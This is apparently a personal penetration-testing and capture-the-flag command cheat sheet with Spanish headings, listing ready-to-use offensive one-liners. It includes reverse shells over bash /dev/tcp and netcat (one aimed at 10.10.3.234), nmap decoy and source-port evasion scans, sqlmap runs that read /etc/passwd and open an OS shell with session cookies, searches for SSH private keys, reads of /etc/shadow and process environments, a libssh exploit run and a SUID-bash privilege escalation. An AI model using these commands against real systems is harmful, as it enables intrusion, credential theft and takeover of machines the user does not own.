Herramientas Catalogos
Comandos Linux
#1 rlwrap nc -lvnp 13000#2 bash -c 'bash -i >& /dev/tcp/0.0.0.0/13000 0>&1'#3 bash -i >& /dev/tcp/0.0.0.0/13000 0>&1#4 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 13000 >/tmp/f
Python
#1 python -c 'import pty; pty.spawn("/bin/bash")'#2 python3 -c 'import pty; pty.spawn("/bin/bash")'
Nmap
#1 sudo nmap 1.1.1.1 -p 21,22,25 -sA -Pn -n --disable-arp-ping --packet-trace#2 sudo nmap 1.1.1.1 -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5#3 sudo nmap 1.1.1.1 -n -Pn -p 445 -O -S 0.0.0.0 -e tun0#4 sudo nmap 1.1.1.1 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53#5 ncat -nv --source-port 53 1.1.1.1 50000#6 sudo nmap -sSU -p 53 --script dns-nsid 1.1.1.1 -Pn -sV
Nmap
#1 sudo nmap -p- -Pn --min-rate 5000 -T4 1.1.1.1#2 sudo nmap -sCV 1.1.1.1 -p22,80
SQLMap
#1 sqlmap -r saveitem --os-shell --dbms=mysql#2 nc -e /bin/bash 0.0.0.0 13000
debugfs
#1 debugfs -R "ls -l /" archivo.dump 2>/dev/null#2 debugfs -R "cat /archivo_listado" archivo.dump 2>/dev/null
Comandos Linux
#1 ls -la /home /root /etc/ssh /home/*/.ssh/; locate id_rsa; locate id_dsa; find / -name id_rsa 2> /dev/null
exploits
#1 python3 cve-2018-10933.py
Comandos Linux
#1 ss -a#2 ss -ant#3 ps -eafww#4 ssh -i .ssh/mykey root@127.0.0.1
Python
#1 print open("/etc/shadow", "r").read()#2 print open("/etc/passwd", "r").read()#3 print open("/proc/self/environ", "r").read()
Comandos Linux
#1 gdb -q -batch \  -ex 'set debuginfod enabled off' \  -ex 'break main' \  -ex 'run' \  -ex 'call (int)x375fb33ff()' \  -ex 'call (int)fflush(0)' \  ./archivo_elf
Comandos Linux
#1 objdump -s -j .rodata --start-address=0x47d000 --stop-address=0x47d020 \ archivo_binario
Comandos Linux
#1 objdump -d --no-show-raw-insn -M intel archivo_elf --disassemble=main
Comandos Linux
#1 readelf -sW archivo_elf | awk '$4=="FILE"' | grep -i CTF
Comandos Linux
#1 readelf -p .comment archivo_elf
Comandos Linux
#1 tail -n +2 fatfile.txt | tr -d '\n'
Comandos Linux
#1 file archivo.dump#2 parted archivo.dump print#3 fsstat archivo.dump#4 xxd -g 1 -l 512 archivo.dump#5 binwalk archivo.dump
Comandos Linux
#1 sudo /usr/local/bin/breal '{}' '__proto__.cmd' '"chmod +s /usr/bin/bash"'#2 /usr/bin/bash -p
SQLMap
#1 sqlmap -u "http://1.1.1.1.1/all-orders.php?status=Delivered" --dbs  --dbms=mysql --cookie='PHPSESSID=pq4cukkr93chi9ldpkji438p4p'#2 sqlmap -u "http://10.0.14.39/all-orders.php?status=Delivered" --dbms=mysql --cookie='PHPSESSID=pq4cukkr93chi9ldpkji438p4p' --file-read=/etc/passwd#3 sqlmap -u "http://10.0.14.39/all-orders.php?status=Delivered" --dbms=mysql --cookie='PHPSESSID=9lgm62u8dqrce118ajhcokoie0' --os-shell#4 nc -e /bin/bash 10.10.3.234 13000
curl
#1 curl -sSik http://1.1.1.1.1#2 curl -sSik http://1.1.1.1.1/login.php